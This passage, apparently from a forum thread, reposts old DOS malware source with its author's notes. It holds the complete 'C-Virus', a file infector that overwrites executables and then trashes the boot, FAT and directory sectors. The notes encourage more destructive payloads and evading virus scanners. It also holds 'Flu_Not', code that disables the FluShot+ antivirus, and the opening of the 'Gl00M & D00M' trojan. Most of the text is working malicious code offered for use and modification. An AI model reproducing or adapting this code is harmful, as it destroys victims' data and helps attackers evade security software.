    23.      C-Virus was written in Borland's Turbo C++ v1.00, but will also compile
    24. under Turbo C v2.00, and should port to other IBM-PC C compilers with little
    25. modification.
    26.      A good area for modification is the function hostile_activity(). This
    27. function is automatically called if there are no files left to infect.  The
    28. current version of C-Virus has this function overwrite the victim's C:'s boot,
    29. FAT, and directory sectors with garbage, the warm reboot so the chump can
    30. experience the horror of DOS telling him his hard disk is screwed - permanently.
    31. You may want to add to this a few select calls to abswrite(), unlink(), and
    32. biosdisk(), or write your own, more devious routines.
    33.      Other good expansions of C-Virus include adding support for multiple-
    34. directory spreads (something I avoided because it would take up too much space);
    35. changing the code so that C-Virus only goes off on certain days, weeks, etc.;
    36. adding memory-resident support; or, for the truly ambitious, adding specific
    37. COMMAND.COM "support" <hehehe>.  Simple modifications to C-Virus can easily
    38. create viruses just as good as the "professionals'."
    39.      Note:  Try to avoid using printf() or related functions; they can increase
    40. the size of C-Virus dramatically.  Instead use the function puts() or, better
    41. yet, use the _write() command, but this is harder to use. In addition, note
    42. that TOO_SMALL is left defined at a 4.8k.  If, when recompiling C-Virus, you
    43. see that the final product is larger or smaller, change TOO_SMALL to a little
    44. over the size of the .EXE file.  This insures maximum effect without alerting
    45. people via increase in file size.  If this number is too small, subsequent
    46. infections will crash because all of the virus code won't be copied.
    47.  
    48.  
    49. III.  Recompiling C-Virus
    50.  
    51.      To re-compile C-Virus, use the included batch file MAKEVIR.BAT.  This
    52. file assumes that you:  (1) Have LZEXE.EXE, and that it's in your path; (2)
    53. DEBUG is also in your path; and (3) That MAKEVIR.SCR is in the current
    54. directory.  If any of these things are different on your computer, change the
    55. batch file accordingly.  If you add "-D" to the command line after MAKEVIR,
    56. debug mode will automatically be activated.  If you use a compiler other than
    57. Turbo C++ or Turbo C, you'll have to change the name of the compiler, as well
    58. as the options it is invoked with.
    59.      A note about the "NMAN" signature:  When creating new versions of C-Virus,
    60. I suggest changing the signature to something else.  IT MUST BE FOUR BYTES
    61. LONG.  Change MAKEVIR.SCR so the second line reads "DB '(four bytes)'."  Also
    62. change the definition of SIGNATURE in the C source code.  I would appreciate
    63. that any modified versions do not read "NMAN" - use some other bytes.  These
    64. bytes not only insure that there is a signature so that files aren't
    65. re-infected, but they also stop people from UNLZEXEing you virus for analysis
    66. (of course they could always change them back, but most people are too stupid
    67. to think of this).
    68.  
    69.  
    70. IV.  Removing C-Virus
    71.  
    72.      DO NOT accidentally infect yourself.  Infected files are unrecoverable.
    73. If you infect your files, the only way to get rid of the virus is to erase
    74. them.  Don't say you weren't warned.
    75.      By the way, no virus-scanner that I know of can identify C-Virus.  Of
    76. course, it's only a matter of time, so be sure to change the signature, the
    77. screw_virex[] array, and the code frequently.  Nothing can remove C-Virus
    78. either.  Oh well.
    79.  
    80.      If you have any questions, suggestions, or complaints, you can leave E-Mail
    81. for me at the Pirate's Guild BBS (1-708-541-1069).
    82.  
    83.  
    84.                                Happy virusing!
    85.  
    86.                                 -Nowhere Man/* C-Virus:  A generic .COM and .EXE infector
    87.    Written by Nowhere Man
    88.    September 23, 1991
    89.    Version 2.0
    90. */
    91.  
    92. #include <dir.h>
    93. #include <dos.h>
    94. #include <fcntl.h>
    95. #include <io.h>
    96. #include <stdio.h>
    97.  
    98.  
    99. /* Note that the #define TOO_SMALL is the minimum size of the .EXE or .COM
    100.    file which CVIRUS can infect without increasing the size of the file.
    101.    (Since this would tip off the victim to CVIRUS's presence, no file under
    102.    this size will be infected.)  It should be set to the approximate size
    103.    of the LZEXEd .EXE file produced from this code.
    104.  
    105.    SIGNATURE is the four-byte signature that CVIRUS checks for to prevent
    106.    re-infection of itself.
    107. */
    108.  
    109. #ifdef DEBUG
    110. #define TOO_SMALL 6100
    111. #else
    112. #define TOO_SMALL 4900
    113. #endif
    114.  
    115. #define SIGNATURE "NMAN"
    116.  
    117.  
    118. /* The following is a table of random byte values.  Be sure to constantly
    119.    change this to prevent detection by virus scanners, but keep it short
    120.    (or non-exsistant) to keep the code size down.
    121. */
    122.  
    123. char screw_virex[] = "\xFF\x17\x12\x39\x54\xFA\x23\xBC\xCD\xAD";
    124.  
    125. void hostile_activity(void)
    126. {
    127.     /* Put whatever you feel like doing here...
    128.        I chose to make this routine trash the victim's boot, FAT, and
    129.        directory sectors, but you can alter this code however you want,
    130.        and are encouraged to do so.
    131.     */
    132.  
    133.  
    134. #ifdef DEBUG
    135.     puts("\aAll files infected!");
    136.     exit(1);
    137. #else
    138.     /* Overwrite five sectors, starting with sector 0, on C:, with the
    139.        memory at location DS:0000 (random garbage).
    140.     */
    141.  
    142.     abswrite(2, 5, 0, (void *) 0);
    143.     __emit__(0xCD, 0x19);   // Reboot computer
    144. #endif
    145. }
    146.  
    147. int infected(char *fname)
    148. {
    149.     /* This function determines if fname is infected.  It reads four
    150.        bytes 28 bytes in from the start and checks them agains the
    151.        current header.  1 is returned if the file is already infected,
    152.        0 if it isn't.
    153.     */
    154.  
    155.     register int handle;
    156.     char virus_signature[35];
    157.     static char check[] = SIGNATURE;
    158.  
    159.     handle = _open(fname, O_RDONLY);
    160.     _read(handle, virus_signature, sizeof(virus_signature));
    161.     close(handle);
    162.  
    163. #ifdef DEBUG
    164.     printf("Signature for %s:  %.4s\n", fname, &virus_signature[28]);
    165. #endif
    166.  
    167.     /* This next bit may look really stupid, but it actually saves about
    168.        100 bytes.
    169.     */
    170.  
    171.     return((virus_signature[28] == check[0]) && (virus_signature[29] == check[1])
    172.            && (virus_signature[30] == check[2]) && (virus_signature[31] == check[3]));
    173. }
    174.  
    175. void spread(char *virus, char *victim)
    176. {
    177.     /* This function infects victim with virus.  First, the file
    178.        sizes of the two files are determined.  Then the victim's
    179.        attributes and file date/time are read and the victim is closed,
    180.        its attributes set to 0, and deleted.  Then the virus is copied
    181.        to the victim's file name.  Its attributes, file date/time, and
    182.        size are set to that of the victim's, preventing detection, and
    183.        the files are closed.
    184.     */
    185.  
    186.     register int virus_handle, victim_handle, attrib;
    187.     struct ftime victim_file_time;
    188.     unsigned virus_size;
    189.     long victim_size;
    190.     char virus_code[TOO_SMALL + 1];
    191.  
    192. #ifdef DEBUG
    193.     printf("Infecting %s with %s...\n", victim, virus);
    194. #endif
    195.  
    196.     /* Open files */
    197.  
    198.     virus_handle = _open(virus, O_RDONLY);
    199.     victim_handle = _open(victim, O_RDONLY);
    200.  
    201.  
    202.     /* Get the actual size of the virus */
    203.  
    204.     virus_size = filelength(virus_handle);
    205.  
    206.  
    207.     /* Get victim's attributes */
    208.  
    209.     victim_size = filelength(victim_handle);
    210.     attrib = _chmod(victim, 0);
    211.     getftime(victim_handle, &victim_file_time);
    212.  
    213.  
    214.     /* Eliminate victim */
    215.  
    216.     close(victim_handle);
    217.     _chmod(victim, 1, 0);
    218.     remove(victim);
    219.  
    220.  
    221. #ifdef DEBUG
    222.     puts("Ok so far...");
    223. #endif
    224.  
    225.     /* Recreate the victim */
    226.  
    227.     victim_handle = _creat(victim, attrib);
    228.  
    229.  
    230.     /* Copy virus */
    231.  
    232.     _read(virus_handle, virus_code, virus_size);
    233.     _write(victim_handle, virus_code, virus_size);
    234.  
    235.  
    236. #ifdef DEBUG
    237.     puts("Almost done...");
    238. #endif
    239.  
    240.     /* Reset victim's file date, time, and size */
    241.  
    242.     chsize(victim_handle, victim_size);
    243.     setftime(victim_handle, &victim_file_time);
    244.  
    245.  
    246.     /* Close files */
    247.  
    248.     close(virus_handle);
    249.     close(victim_handle);
    250.  
    251. #ifdef DEBUG
    252.     puts("Infection complete!");
    253. #endif
    254. }
    255.  
    256. char *victim(void)
    257. {
    258.     /* This function returns a pointer to the name of the virus's next
    259.        victim.  This routine is set up to try to infect .EXE and .COM
    260.        files.  If there is a command line argument, it will try to infect
    261.        that file instead.  If all files are infected, hostile activity
    262.        is initiated...
    263.     */
    264.  
    265.     register int done;
    266.     register char **ext;
    267.     static char *types[] = {"*.EXE", "*.COM", NULL};
    268.     static struct ffblk ffblk;
    269.  
    270.     for (ext = (*++_argv) ? _argv : types; *ext; ext++) {
    271.         done = findfirst(*ext, &ffblk, FA_RDONLY | FA_HIDDEN | FA_SYSTEM | FA_ARCH);
    272.         while (!done) {
    273.  
    274. #ifdef DEBUG
    275.             printf("Scanning %s...\n", ffblk.ff_name);
    276. #endif
    277.  
    278.     /* If you want to check for specific days of the week, months, etc.,
    279.        here is the place to insert the code (don't forget to "#include
    280.        <time.h>").
    281.     */
    282.  
    283.             if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize > TOO_SMALL))
    284.                 return(ffblk.ff_name);
    285.             done = findnext(&ffblk);
    286.         }
    287.     }
    288.  
    289.  
    290.     /* If there are no files left to infect, have a little fun */
    291.  
    292.     hostile_activity();
    293. }
    294.  
    295. int main(void)
    296. {
    297.     /* In the main program, a victim is found and infected.  If all files
    298.        are infected, a malicious action is performed.  Otherwise, a bogus
    299.        error message is displayed, and the virus terminates with code
    300.        1, simulating an error.
    301.     */
    302.  
    303.     static char *err_msg[] = {"Out of memory", "Bad EXE format",
    304.                   "Invalid DOS version", "Bad memory block",
    305.                   "FCB creation error", "Sharing violation",
    306.                   "Abnormal program termination",
    307.                   "Divide error"
    308.                  };
    309.     register char *virus_name = *_argv;
    310.  
    311.     spread(virus_name, victim());
    312.     puts(err_msg[peek(0, 0x46C) % (sizeof(err_msg) / sizeof(char *))]);
    313.     return(1);
    314. }
    315.  
    316.  
    317.  
    318.                   ɍ͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍ͻ
    319.                   ?          The Hell Pit BBS              ?
    320.                   ?              1200/2400                 ?
    321.                   ? Sysops:    Operating At    Permanent   ?
    322.                   ?  HADES       4,500,000? suntans    ?
    323.                   ?  K?TO                      available   ?
    324.                   ?       ?    (708)459-7267               ?
    325.                   ?      ???                   ?          ??
    326.                   ? ?   ?????      ?          ??         ???
    327.                   ??   ???????      ?        ????       ????
    328.                   ??? ?????????   ????     ???????     ?????
    329.                   ?? ??????????? ???????   ????????   ??????
    330.                   ??????????????????????? ?????????? ???????
    331.                   ??????????????????????????????????????????
    332.                   ȍ͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍ͼ
    333.                             We want your viruses!
    334.  
    335.  
    336.  
    337.  
    338.  
    339. A 11C
    340. DB "NMAN"
    341.  
    342. W
    343. Q


    C Code:
    1. // Flu_Not version 1.0
    2. // 27 Nov 1991
    3. // Dark Angel & Demogorgon of PHALCON/SKISM Co-op
    4. //
    5. // This is to be used in a program which bypasses FluShot.
    6. // The method is completely generic and 99.99% infallible.
    7. // To use it, #include the file and call checkflu().  This
    8. // will set up all the necessary variables.  flu_disable()
    9. // and flu_enable() do what they imply.
    10. //
    11. // NOTE:  checkflu() MUST be called before flu_disable and
    12. //        flu_enable.
    13. //
    14. // Oh yeah, it works under TC/BC
    15.  
    16. #ifndef __DOS_H__
    17. #include <dos.h>
    18. #endif
    19.  
    20. int flu_seg, flu_off = 0x1000;
    21. int fluinstalled = 0;
    22.  
    23. int checkflu(void);
    24.  
    25. // flu_disable() is a macro to disable FluShot+ (Duh!)
    26. #define flu_disable() if (fluinstalled) poke(flu_seg,flu_off,0xC3F8)
    27.  
    28. // Need I explain flu_enable()?
    29. #define flu_enable()  if (fluinstalled) poke(flu_seg,flu_off,0x5250)
    30.  
    31. // checkflu() returns a 0 if FluShot+ is not installed, 1 otherwise
    32. int checkflu(void)
    33. {
    34.   // Note that checkflu() doesn't use INT 21h/FF0Fh to determine if
    35.   //  FluShot+ is resident.  This was because I was lazy and didn't
    36.   //  want to invoke TASM when compiling.  It is easy enough to do.
    37.  
    38.   // Find possible FluShot+ segment in interrupt table
    39.   flu_seg = peek(0x0000,0x004E);
    40.  
    41.   // Search for 0x593C, the identifier for the FluShot+ "blue window"
    42.   //  routine
    43.   while ((peek(flu_seg,++flu_off)) != 0x593C)
    44.     // If not found in the first 0x5000 bytes of code, then FluShot+
    45.     //  isn't installed
    46.     if (flu_off > 0x5000) return (0);
    47.  
    48.   while (peek(flu_seg,--flu_off) != 0x5250)
    49.     // Search for the beginning of the routine, which is marked by
    50.     //  0x5250.  If not found by 0x1001, then FluShot+ is not installed
    51.     if (flu_off < 0x1001) return (0);
    52.  
    53.   // Yay!  We found it!  flu_seg and flu_off are now properly loaded.
    54.   fluinstalled = 1;
    55.   return (1);
    56. }

  4. #4
    Ngày gia nhập
    02 2008
    Bài viết
    1,009

    C Code:
    1. /*
    2.          Gl00M & D00M trojan, 2-'93  ۛ۲?????ĄĄœandoZč
    3.          *safe for compiling until 'armed': check the code*
    4.  
    5. */
    6.  
    7. #include <string.h>
    8. #include <conio.h>
    9. #include <dos.h>
    10. void clearscreen(void);
    11. union REGS regs;
    12.  
    13.  
    14. int gloom_screen[] = {
    15.     0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB,
    16.     0x5DB, 0x5DB, 0x520, 0x20, 0x20, 0x20, 0x20, 0x20,
    17.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    18.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    19.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    20.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    21.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    22.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    23.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2DB, 0x2DB,
    24.     0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB,
    25.     0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB,
    26.     0x5DB, 0x5DB, 0x520, 0x20, 0x20, 0x20, 0x20, 0x20,
    27.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    28.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    29.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    30.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    31.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    32.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    33.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2DB, 0x2DB,
    34.     0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB,
    35.     0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0xDDB, 0xDDB,
    36.     0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB,
    37.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    38.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    39.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    40.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    41.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    42.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    43.     0x20, 0xADB, 0xADB, 0xADB, 0xADB, 0xADB, 0xADB, 0xADB,
    44.     0xADB, 0xADB, 0xADB, 0xADB, 0x2DB, 0x2DB, 0x2DB, 0x2DB,
    45.     0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0xDDB, 0xDDB,
    46.     0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB,
    47.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    48.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    49.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    50.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    51.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    52.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    53.     0x20, 0xADB, 0xADB, 0xADB, 0xADB, 0xADB, 0xADB, 0xADB,
    54.     0xADB, 0xADB, 0xADB, 0xADB, 0x2DB, 0x2DB, 0x2DB, 0x2DB,
    55.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0xDDB, 0xDDB,
    56.     0xDDB, 0xDDB, 0xDDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB,
    57.     0xCDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB, 0x20, 0x20, 0x20,
    58.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    59.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    60.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    61.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    62.     0x20, 0x20, 0x20, 0x20, 0xEDB, 0xEDB, 0xEDB, 0xEDB,
    63.     0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xADB, 0xADB,
    64.     0xADB, 0xADB, 0xADB, 0xADB, 0x20, 0x20, 0x20, 0x20,
    65.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0xDDB, 0xDDB,
    66.     0xDDB, 0xDDB, 0xDDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB,
    67.     0xCDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB, 0x20, 0x20, 0x20,
    68.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    69.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    70.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    71.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    72.     0x20, 0x20, 0x20, 0x20, 0xEDB, 0xEDB, 0xEDB, 0xEDB,
    73.     0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xADB, 0xADB,
    74.     0xADB, 0xADB, 0xADB, 0xADB, 0x20, 0x20, 0x20, 0x20,
    75.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    76.     0x20, 0x20, 0x20, 0xCDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB,
    77.     0xCDB, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x4DB,
    78.     0x4DB, 0x4DB, 0x4DB, 0x20, 0x20, 0x20, 0x20, 0x20,
    79.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    80.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    81.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0xBDB, 0xBDB,
    82.     0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB,
    83.     0xBDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0x20, 0x20,
    84.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    85.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    86.     0x20, 0x20, 0x20, 0xCDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB,
    87.     0xCDB, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x4DB,
    88.     0x4DB, 0x4DB, 0x4DB, 0x20, 0x20, 0x20, 0x20, 0x20,
    89.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    90.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    91.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0xBDB, 0xBDB,
    92.     0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB,
    93.     0xBDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0x20, 0x20,
    94.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    95.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    96.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    97.     0x20, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x8DB, 0x8DB, 0x8DB,
    98.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
    99.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
    100.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
    101.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
    102.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0xBDB, 0xBDB, 0xBDB, 0xBDB,
    103.     0xBDB, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    104.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    105.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    106.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    107.     0x20, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x8DB, 0x8DB, 0x8DB,
    108.     0x8DB, 0x8DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
    109.     0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
    110.     0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
    111.     0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x8DB, 0x8DB,
    112.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0xBDB, 0xBDB, 0xBDB, 0xBDB,
    113.     0xBDB, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    114.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    115.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    116.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    117.     0x20, 0x20, 0x20, 0x20, 0x20, 0x8DB, 0x8DB, 0x8DB,
    118.     0x8DB, 0x8DB, 0x1DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB,
    119.     0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB,
    120.     0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB,
    121.     0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x1DB, 0x8DB, 0x8DB,
    122.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x20, 0x20, 0x20, 0x20,
    123.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    124.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    125.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    126.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    127.     0x20, 0x20, 0x20, 0x20, 0x20, 0x8DB, 0x8DB, 0x8DB,
    128.     0x8DB, 0x820, 0x1DB, 0x1DB, 0x1F54, 0x1F68, 0x1F65, 0x1F20,
    129.     0x1F77, 0x1F6F, 0x1F72, 0x1F73, 0x1F74, 0x1F20, 0x1F74, 0x1F72,
    130.     0x1F6F, 0x1F6A, 0x1F61, 0x1F6E, 0x1F20, 0x1F6F, 0x1F66, 0x1F20,
    131.     0x1F61, 0x1F6C, 0x1F6C, 0x1DB, 0x1DB, 0x1DB, 0x8DB, 0x8DB,
    132.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x20, 0x20, 0x20, 0x20,
    133.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    134.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    135.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    136.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    137.     0x20, 0x20, 0x20, 0x20, 0x20, 0x8DB, 0x8DB, 0x8DB,
    138.     0x8DB, 0x820, 0x1DB, 0x1F69, 0x1F73, 0x1F20, 0x1F74, 0x1F68,
    139.     0x1F65, 0x1F20, 0x1F6F, 0x1F6E, 0x1F65, 0x1F20, 0x1F74, 0x1F68,
    140.     0x1F61, 0x1F74, 0x1F20, 0x1F68, 0x1F69, 0x1F74, 0x1F73, 0x1DB,
    141.     0x1F79, 0x1F6F, 0x1F75, 0x1F21, 0x1DB, 0x1DB, 0x8DB, 0x8DB,
    142.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x20, 0x20, 0x20, 0x20,
    143.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    144.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    145.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    146.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    147.     0x20, 0x20, 0x20, 0x20, 0x20, 0x8DB, 0x8DB, 0x8DB,
    148.     0x8DB, 0x820, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
    149.     0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
    150.     0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
    151.     0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x8DB, 0x8DB,
    152.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x20, 0x20, 0x20, 0x20,
    153.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    154.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    155.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    156.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    157.     0x20, 0x20, 0x20, 0x20, 0x20, 0x8DB, 0x8DB, 0x8DB,
    158.     0x8DB, 0x820, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
    159.     0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
    160.     0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
    161.     0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x8DB, 0x8DB,
    162.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x20, 0x20, 0x20, 0x20,
    163.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    164.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    165.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    166.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    167.     0x20, 0x20, 0x20, 0x20, 0x20, 0x8DB, 0x8DB, 0x8DB,
    168.     0x8DB, 0x820, 0x120, 0x120, 0x120, 0x120, 0x120, 0x120,
    169.     0x120, 0x120, 0x120, 0x120, 0x120, 0x120, 0x120, 0x120,
    170.     0x120, 0x120, 0x120, 0x120, 0x120, 0x120, 0x120, 0x120,
    171.     0x120, 0x120, 0x120, 0x120, 0x120, 0x120, 0x8DB, 0x8DB,
    172.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x20, 0x20, 0x20, 0x20,
    173.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    174.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    175.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    176.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    177.     0x20, 0x20, 0x20, 0x20, 0x20, 0x8DB, 0x8DB, 0x8DB,
    178.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
    179.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
    180.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
    181.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
    182.     0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x20, 0x20, 0x20, 0x20,
    183.     0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
